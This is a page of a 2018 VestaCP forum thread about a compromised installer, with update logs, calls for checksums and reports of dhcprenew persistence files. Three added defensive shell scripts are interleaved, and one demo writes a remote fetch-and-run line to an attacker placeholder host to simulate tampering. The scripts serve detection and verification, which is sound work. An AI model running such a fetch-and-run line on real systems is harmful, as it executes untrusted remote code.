Vesta Control Panel - Forum

Community Forum

All VestaCP installations being attacked (Topic is solved)

General questions about VestaCP
231 posts
  • Page 20 of 24
Stesh
Posts: 348
Joined: Mon Nov 09, 2015 5:52 pm

Os: CentOS 6x
Web: nginx + php-fpm
Re: All VestaCP installations being attacked

Post by Stesh » Thu Oct 18, 2018 12:40 pm

someuser wrote (Thu Oct 18, 2018 10:45 am):

Code:

[root@vpszcka ~]# yum update vesta
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
 * base: mirror.hosting90.cz
 * epel: mirror.spreitzer.ch
 * extras: mirror.hosting90.cz
 * remi: remi.schlundtech.de
 * remi-php55: remi.schlundtech.de
 * remi-php56: remi.schlundtech.de
 * remi-safe: remi.schlundtech.de
 * remi-test: remi.schlundtech.de
 * updates: mirror.hosting90.cz
No packages marked for update
Is it okay?
No, the repository information has not been updated.

Code:

# yum clean all
# rm -rf /var/cache/yum
# yum update vesta\*
Example:

Code:

[root@vm2 ~]# yum info vesta
Loaded plugins: fastestmirror
Repodata is over 2 weeks old. Install yum-cron? Or run: yum makecache fast
Loading mirror speeds from cached hostfile
 * base: centos.mirrors.ovh.net
 * epel: mirror.freethought-internet.co.uk
 * extras: centos.mirrors.ovh.net
 * remi: rpms.remirepo.net
 * remi-php56: rpms.remirepo.net
 * remi-safe: rpms.remirepo.net
 * remi-test: rpms.remirepo.net
 * updates: centos.mirrors.ovh.net
Installed Packages
Name        : vesta
Arch        : x86_64
Version     : 0.9.8
Release     : 22
Size        : 13 M
Repo        : installed
From repo   : vesta
Summary     : Vesta Control Panel
URL         : http://vestacp.com/
License     : GPL
Description : This package contains the packages for Vesta Control Panel api.

[root@vm2 ~]# yum info vesta
Loaded plugins: fastestmirror
base                                                     | 3.6 kB     00:00
epel/x86_64/metalink                                     |  26 kB     00:00
epel                                                     | 3.2 kB     00:00
extras                                                   | 3.4 kB     00:00
mariadb                                                  | 2.9 kB     00:00
nginx                                                    | 2.9 kB     00:00
remi                                                     | 2.9 kB     00:00
remi-debuginfo                                           | 2.9 kB     00:00
remi-php55-debuginfo                                     | 2.9 kB     00:00
remi-php56                                               | 2.9 kB     00:00
remi-php56-debuginfo                                     | 2.9 kB     00:00
remi-safe                                                | 2.9 kB     00:00
remi-test                                                | 2.9 kB     00:00
remi-test-debuginfo                                      | 2.9 kB     00:00
updates                                                  | 3.4 kB     00:00
vesta                                                    | 2.9 kB     00:00
(1/18): epel/x86_64/group_gz                               |  88 kB   00:00
(2/18): epel/x86_64/updateinfo                             | 933 kB   00:00
(3/18): base/7/x86_64/group_gz                             | 166 kB   00:00
(4/18): nginx/x86_64/primary_db                            |  35 kB   00:00
(5/18): epel/x86_64/primary                                | 3.6 MB   00:00
(6/18): extras/7/x86_64/primary_db                         | 204 kB   00:00
(7/18): remi-php55-debuginfo/x86_64/primary_db             |  53 kB   00:00
(8/18): remi-debuginfo/x86_64/primary_db                   | 444 kB   00:00
(9/18): remi-php56-debuginfo/x86_64/primary_db             |  53 kB   00:00
(10/18): remi/primary_db                                   | 2.2 MB   00:00
(11/18): remi-php56/primary_db                             | 233 kB   00:00
(12/18): remi-test/primary_db                              | 580 kB   00:00
(13/18): remi-test-debuginfo/x86_64/primary_db             | 115 kB   00:00
(14/18): mariadb/primary_db                                |  65 kB   00:00
(15/18): remi-safe/primary_db                              | 1.3 MB   00:00
(16/18): updates/7/x86_64/primary_db                       | 6.0 MB   00:00
(17/18): vesta/x86_64/primary_db                           |  83 kB   00:00
(18/18): base/7/x86_64/primary_db                          | 5.9 MB   00:01
Determining fastest mirrors
 * base: centos.mirrors.ovh.net
 * epel: epel.mirror.wearetriple.com
 * extras: centos.mirrors.ovh.net
 * remi: remi.mirror.ate.info
 * remi-php56: remi.mirror.ate.info
 * remi-safe: remi.mirror.ate.info
 * remi-test: remi.mirror.ate.info
 * updates: centos.mirrors.ovh.net
epel                                                                12741/12741
Installed Packages
Name        : vesta
Arch        : x86_64
Version     : 0.9.8
Release     : 22
Size        : 13 M
Repo        : installed
From repo   : vesta
Summary     : Vesta Control Panel
URL         : http://vestacp.com/
License     : GPL
Description : This package contains the packages for Vesta Control Panel api.

Available Packages
Name        : vesta
Arch        : x86_64
Version     : 0.9.8
Release     : 23
Size        : 2.6 M
Repo        : vesta/x86_64
Summary     : Vesta Control Panel
URL         : http://vestacp.com/
License     : GPL
Description : This package contains the packages for Vesta Control Panel api.

[root@vm2 ~]# yum update vesta\*
Loaded plugins: fastestmirror
Loading mirror speeds from cached hostfile
 * base: centos.mirrors.ovh.net
 * epel: epel.mirror.wearetriple.com
 * extras: centos.mirrors.ovh.net
 * remi: remi.mirror.ate.info
 * remi-php56: remi.mirror.ate.info
 * remi-safe: remi.mirror.ate.info
 * remi-test: remi.mirror.ate.info
 * updates: centos.mirrors.ovh.net
Resolving Dependencies
--> Running transaction check
---> Package vesta.x86_64 0:0.9.8-22 will be updated
---> Package vesta.x86_64 0:0.9.8-23 will be an update
---> Package vesta-nginx.x86_64 0:0.9.8-22 will be updated
---> Package vesta-nginx.x86_64 0:0.9.8-23 will be an update
---> Package vesta-php.x86_64 0:0.9.8-22 will be updated
---> Package vesta-php.x86_64 0:0.9.8-23 will be an update
--> Finished Dependency Resolution

Dependencies Resolved

============================================================================================================================
 Package                         Arch                       Version                         Repository                 Size
============================================================================================================================
Updating:
 vesta                           x86_64                     0.9.8-23                        vesta                     2.6 M
 vesta-nginx                     x86_64                     0.9.8-23                        vesta                     297 k
 vesta-php                       x86_64                     0.9.8-23                        vesta                      12 M

Transaction Summary
============================================================================================================================
Upgrade  3 Packages

Total download size: 15 M
Is this ok [y/d/N]: y
Downloading packages:
Delta RPMs disabled because /usr/bin/applydeltarpm not installed.
(1/3): vesta-nginx-0.9.8-23.x86_64.rpm                                                               | 297 kB  00:00:00
(2/3): vesta-0.9.8-23.x86_64.rpm                                                                     | 2.6 MB  00:00:01
(3/3): vesta-php-0.9.8-23.x86_64.rpm                                                                 |  12 MB  00:00:01
----------------------------------------------------------------------------------------------------------------------------
Total                                                                                       6.6 MB/s |  15 MB  00:00:02
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Updating   : vesta-php-0.9.8-23.x86_64                                                                                1/6
  Updating   : vesta-0.9.8-23.x86_64                                                                                    2/6
  Updating   : vesta-nginx-0.9.8-23.x86_64                                                                              3/6
  Cleanup    : vesta-0.9.8-22.x86_64                                                                                    4/6
  Cleanup    : vesta-php-0.9.8-22.x86_64                                                                                5/6
  Cleanup    : vesta-nginx-0.9.8-22.x86_64                                                                              6/6
  Verifying  : vesta-0.9.8-23.x86_64                                                                                    1/6
  Verifying  : vesta-nginx-0.9.8-23.x86_64                                                                              2/6
  Verifying  : vesta-php-0.9.8-23.x86_64                                                                                3/6
  Verifying  : vesta-0.9.8-22.x86_64                                                                                    4/6
  Verifying  : vesta-nginx-0.9.8-22.x86_64                                                                              5/6
  Verifying  : vesta-php-0.9.8-22.x86_64                                                                                6/6

Updated:
  vesta.x86_64 0:0.9.8-23              vesta-nginx.x86_64 0:0.9.8-23              vesta-php.x86_64 0:0.9.8-23

Complete!
[root@vm2 ~]#

xjlin0
Posts: 22
Joined: Fri Dec 30, 2016 2:22 pm

Re: All VestaCP installations being attacked

Post by xjlin0 » Thu Oct 18, 2018 1:49 pm

Do you publish MD5 hashes of the installer files for each version somewhere, or in the release notes?

Let's say the MD5 hashes of the installer files were uploaded to GitHub; then everyone could help track whether the installer files were changed unintentionally.
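The integrity check xjlin0 asks for, as an added example that is not part of the original thread or of the VestaCP project: a POSIX shell function that checks a downloaded installer against a published checksum file before anything executes it. It uses SHA-256 rather than MD5, since MD5 collisions are practical to construct, and its file names and checksum layout (the sha256sum format of one `<hex>  <name>` line per file) are assumptions, not something the project publishes. One caveat a practitioner should keep in mind: a checksum file served from the same place as the installer is controlled by whoever controls that place, so it needs to come over an independent channel (a commit in the Git repository, a signed release note), or be replaced by a detached signature verified against a key obtained elsewhere.

```shell
#!/bin/sh
# Added example (not VestaCP project code): verify a downloaded installer
# against a checksum file obtained over an independent channel, before
# anything runs it. File names and checksum layout are assumptions.

# sha256_of FILE -> prints the hex SHA-256 of FILE (GNU or BSD userland)
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{ print $1 }'
    else
        shasum -a 256 "$1" | awk '{ print $1 }'
    fi
}

# verify_installer FILE CHECKSUM_FILE
# CHECKSUM_FILE holds sha256sum-style lines: "<hex>  <basename>".
# Returns 0 on match, 1 on mismatch, 2 when no entry exists for FILE.
# It never executes FILE; the caller decides what to do with the result.
verify_installer() {
    file=$1
    sums=$2
    name=$(basename "$file")
    expected=$(awk -v n="$name" '$2 == n { print $1; exit }' "$sums")
    if [ -z "$expected" ]; then
        echo "no checksum published for $name; refusing to trust it" >&2
        return 2
    fi
    actual=$(sha256_of "$file")
    if [ "$actual" != "$expected" ]; then
        echo "CHECKSUM MISMATCH for $name" >&2
        echo "  expected $expected" >&2
        echo "  actual   $actual" >&2
        return 1
    fi
    echo "$name matches the published SHA-256"
    return 0
}

# demo: constructed files in a temp dir, no network involved
demo() {
    dir=$(mktemp -d)
    printf '#!/bin/bash\necho "installing"\n' > "$dir/vst-install-demo.sh"
    # "published" checksum taken from the pristine copy (out-of-band in real use)
    printf '%s  vst-install-demo.sh\n' "$(sha256_of "$dir/vst-install-demo.sh")" > "$dir/SHA256SUMS"
    verify_installer "$dir/vst-install-demo.sh" "$dir/SHA256SUMS"   # rc 0: intact
    printf 'curl http://attacker.invalid/x | sh\n' >> "$dir/vst-install-demo.sh"
    verify_installer "$dir/vst-install-demo.sh" "$dir/SHA256SUMS"   # rc 1: tampered
    cp "$dir/vst-install-demo.sh" "$dir/other.sh"
    verify_installer "$dir/other.sh" "$dir/SHA256SUMS"              # rc 2: no entry
    rm -rf "$dir"
}
case "${1:-}" in demo) demo ;; esac
```

Run it as `sh verify.sh demo` to see the three outcomes; in a real pipeline, call `verify_installer` and only hand the file to `bash` when it returns 0.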

ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: All VestaCP installations being attacked

Post by ScIT » Thu Oct 18, 2018 2:05 pm

skid wrote (Wed Oct 17, 2018 10:18 pm):
Thank you for the suggestions. Remote config server c.vestacp.com is now deprecated. The server is still up and running but the new installer doesn't use it anymore. All service configuration files are installed from the vesta package.
The Debian installer still uses wget and c.vestacp.com for the configuration files.

ScIT
Support team
Posts: 617
Joined: Mon Feb 23, 2015 4:13 pm

Os: Ubuntu 17x
Web: apache + nginx
Re: All VestaCP installations being attacked

Post by ScIT » Thu Oct 18, 2018 3:48 pm

ScIT wrote (Thu Oct 18, 2018 2:05 pm):
skid wrote (Wed Oct 17, 2018 10:18 pm):
Thank you for the suggestions. Remote config server c.vestacp.com is now deprecated. The server is still up and running but the new installer doesn't use it anymore. All service configuration files are installed from the vesta package.
The Debian installer still uses wget and c.vestacp.com for the configuration files.
Fixed, thanks! https://github.com/serghey-rodin/vesta/ ... 1b8682bca9

Spheerys
Posts: 225
Joined: Tue Dec 29, 2015 12:36 pm

Os: Debian 7x
Web: apache + nginx
Re: All VestaCP installations being attacked

Post by Spheerys » Thu Oct 18, 2018 5:40 pm

The other operating systems' installation scripts are still calling c.vestacp.com.
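ScIT's and Spheerys's point above (installers that still pull configuration from c.vestacp.com with wget) is easy to check before an installer is run at all. The following is an added example, not code from the thread or from the project: a shell function that lists every host an install script would contact through wget or curl, skipping commented lines, plus a helper that fails when any such host is present. The sample script it runs against is constructed here and its URL paths are hypothetical. The security point is the one skid's quoted post makes: configuration that arrives over the network at install time is whatever the owner of that host serves at that moment, so an installer that ships its configuration inside the package leaves no such hook.

```shell
#!/bin/sh
# Added example (not VestaCP project code): audit an install script for
# files it fetches over the network while it runs.

# list_remote_hosts SCRIPT
# Prints, one per line and de-duplicated, every host named in a wget or
# curl invocation in SCRIPT. Comment lines are ignored; a line holding
# several URLs contributes each of them.
list_remote_hosts() {
    grep -v '^[[:space:]]*#' "$1" |
        grep -E '(^|[[:space:]|;&(])(wget|curl)[[:space:]]' |
        grep -oE "https?://[^/[:space:]\"']+" |
        sed -E 's#^https?://##' |
        sort -u
}

# assert_self_contained SCRIPT
# Returns 0 when SCRIPT fetches nothing over the network, 1 otherwise,
# naming the hosts on stderr so the reviewer can decide whether each one
# is a package mirror or an out-of-band configuration source.
assert_self_contained() {
    hosts=$(list_remote_hosts "$1")
    if [ -n "$hosts" ]; then
        echo "$1 fetches files from:" >&2
        echo "$hosts" | sed 's/^/  /' >&2
        return 1
    fi
    return 0
}

# demo: a constructed installer fragment (paths hypothetical)
demo() {
    dir=$(mktemp -d)
    cat > "$dir/install.sh" <<'EOF'
#!/bin/bash
# wget http://commented.example/ignored
apt-get install -y nginx php-fpm
wget -q http://c.vestacp.com/EXAMPLE/nginx.conf -O /etc/nginx/nginx.conf
curl -sS "https://c.vestacp.com/EXAMPLE/php-fpm.conf" -o /etc/php5/fpm/php-fpm.conf
cp /usr/local/vesta/install/nginx.conf /etc/nginx/nginx.conf
EOF
    assert_self_contained "$dir/install.sh" || echo "=> review before running"
    rm -rf "$dir"
}
case "${1:-}" in demo) demo ;; esac
```

Run it as `sh audit.sh demo`; point `assert_self_contained` at the real vst-install script for your distribution to see which hosts it would reach. Package mirrors reached through apt or yum are not reported, since those go through the package manager's own signature checks rather than a bare download.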

pipoy
Posts: 112
Joined: Mon Sep 11, 2017 8:02 am

Os: CentOS 6x
Web: apache
Re: All VestaCP installations being attacked

Post by pipoy » Fri Oct 19, 2018 5:47 am

As always, thank you for the hard work.

Falzo
Posts: 60
Joined: Mon Mar 28, 2016 8:49 am

Re: All VestaCP installations being attacked

Post by Falzo » Fri Oct 19, 2018 9:33 am

skid wrote (Wed Oct 17, 2018 8:25 pm):
Please check if your server IP is here
>>>>> http://vestacp.com/test/?ip=127.0.0.1 <<<<<
Sorry to be the bummer here again, but this shows 'not infected' for a server IP of mine where the malicious installer (Debian) was used on 13 August. The server was not hacked at all, because I changed the random password after install as already pointed out, but shouldn't it be on your list or database then?

Care to clarify what your old notify script did and how the strings got stored? As you obviously still have (a part of) that data, a bit more insight would be much appreciated.

I would also like to know if there are more details on the timeframe. I doubt the aforementioned May/June is correct; at least that's not fitting for what I see on Debian boxes. From the looks of it, on the latter the script was tampered with at the end of July/beginning of August and was probably cleaned at some point in September when you finally noticed that something had happened.
May is just the timestamp of the installer file, but that's the same for the infected as for the original one, and doesn't give the installation date _at all_.

Open request to you, Serghey: simply stop playing hide and seek and report a proper timeline of what happened when already. People are getting annoyed with Vesta not because of the incidents, but because of the lack of response and information.
Finally man up and defend your project the right way: by communicating quickly and asking for help if needed.

imperio
VestaCP Team
Posts: 7000
Joined: Sat Dec 01, 2012 12:37 pm

Re: All VestaCP installations being attacked

Post by imperio » Fri Oct 19, 2018 9:49 am

Falzo, stop the insults. We have said it all in this thread.
You can find more information here:
https://www.welivesecurity.com/2018/10/ ... installed/

Next time I'll give you a warning.

kandalf
Posts: 87
Joined: Tue May 13, 2014 11:53 pm

Re: All VestaCP installations being attacked

Post by kandalf » Fri Oct 19, 2018 10:08 am

imperio wrote (Fri Oct 19, 2018 9:49 am):
Falzo, stop the insults. We have said it all in this thread.
You can find more information here:
https://www.welivesecurity.com/2018/10/ ... installed/

Next time I'll give you a warning.
Thanks for the link. On one of my servers I have the file /etc/init.d/dhcprenew and not /usr/bin/dhcprenew; I also have multiple symlinks that can be found using:
ls /etc/rc[1-5].d/
ls /etc/rc.d/rc[1-5].d/

I think I should reinstall the server.
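A read-only check for the artefacts kandalf describes, as an added example that is not from the thread, the linked article or the VestaCP project. The function looks, under a root directory you pass (defaulting to the live filesystem), for /usr/bin/dhcprenew, /etc/init.d/dhcprenew and any entry in the SysV rc directories whose name contains dhcprenew, reports each one with its link target, and on the live system also reports a running process of that name; it returns 1 when it found something and 0 otherwise. It deliberately removes nothing: on a host where this fires, the useful next steps are to preserve the script and binary for analysis and then follow the cleanup the linked article describes, or rebuild, as kandalf decided. The root-directory parameter, the rc0 to rc6 range and the contents of the sample tree are assumptions made so the function can be exercised against a constructed directory.

```shell
#!/bin/sh
# Added example (not VestaCP project code): report the dhcprenew persistence
# artefacts named in the thread without modifying anything.

# check_dhcprenew_persistence [ROOT]
# ROOT defaults to "" (the live system). Prints one line per finding.
# Returns 0 when nothing was found, 1 otherwise.
check_dhcprenew_persistence() {
    root=${1:-}
    found=0
    for f in "$root/usr/bin/dhcprenew" "$root/etc/init.d/dhcprenew"; do
        if [ -e "$f" ] || [ -L "$f" ]; then
            echo "file: $f"
            found=1
        fi
    done
    # SysV run-level directories on both Debian and RHEL-style layouts
    for d in "$root"/etc/rc[0-6].d "$root"/etc/rc.d/rc[0-6].d; do
        [ -d "$d" ] || continue
        for entry in "$d"/*dhcprenew*; do
            # a non-matching glob expands to itself; -L also catches dangling links
            [ -e "$entry" ] || [ -L "$entry" ] || continue
            if [ -L "$entry" ]; then
                echo "symlink: $entry -> $(readlink "$entry")"
            else
                echo "file: $entry"
            fi
            found=1
        done
    done
    # only meaningful on the live system: is it running right now?
    if [ -z "$root" ] && command -v pgrep >/dev/null 2>&1; then
        if pids=$(pgrep -x dhcprenew); then
            echo "process: dhcprenew running as pid(s) $pids"
            found=1
        fi
    fi
    return "$found"
}

# demo: a constructed tree resembling kandalf's report, then a clean one
demo() {
    dir=$(mktemp -d)
    mkdir -p "$dir/etc/init.d" "$dir/etc/rc3.d" "$dir/etc/rc5.d" "$dir/clean/etc/init.d"
    printf '#!/bin/sh\n# constructed stand-in for the init script\n' > "$dir/etc/init.d/dhcprenew"
    ln -s ../init.d/dhcprenew "$dir/etc/rc3.d/S90dhcprenew"
    ln -s ../init.d/dhcprenew "$dir/etc/rc5.d/S90dhcprenew"
    check_dhcprenew_persistence "$dir" || echo "=> findings, preserve and investigate"
    check_dhcprenew_persistence "$dir/clean" && echo "=> clean tree, nothing found"
    rm -rf "$dir"
}
case "${1:-}" in demo) demo ;; esac
```

Run it as `sh check.sh demo` for the constructed tree, or source it and call `check_dhcprenew_persistence` with no argument on a suspect host. A clean result only says these particular names are absent; it is not evidence that the host is uncompromised.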

imperio
VestaCP Team
Posts: 7000
Joined: Sat Dec 01, 2012 12:37 pm

Re: All VestaCP installations being attacked

Post by imperio » Fri Oct 19, 2018 10:12 am

kandalf wrote (Fri Oct 19, 2018 10:08 am):
imperio wrote (Fri Oct 19, 2018 9:49 am):
Falzo, stop the insults. We have said it all in this thread.
You can find more information here:
https://www.welivesecurity.com/2018/10/ ... installed/

Next time I'll give you a warning.
Thanks for the link. On one of my servers I have the file /etc/init.d/dhcprenew and not /usr/bin/dhcprenew; I also have multiple symlinks that can be found using:
ls /etc/rc[1-5].d/
ls /etc/rc.d/rc[1-5].d/

I think I should reinstall the server.
You can clear your server; see
https://www.welivesecurity.com/2018/10/ ... installed/
sections "First stage" and "Persistence mechanism and link to Xor.DDoS".


  • All times are UTC
Powered by phpBB® Forum Software © phpBB Limited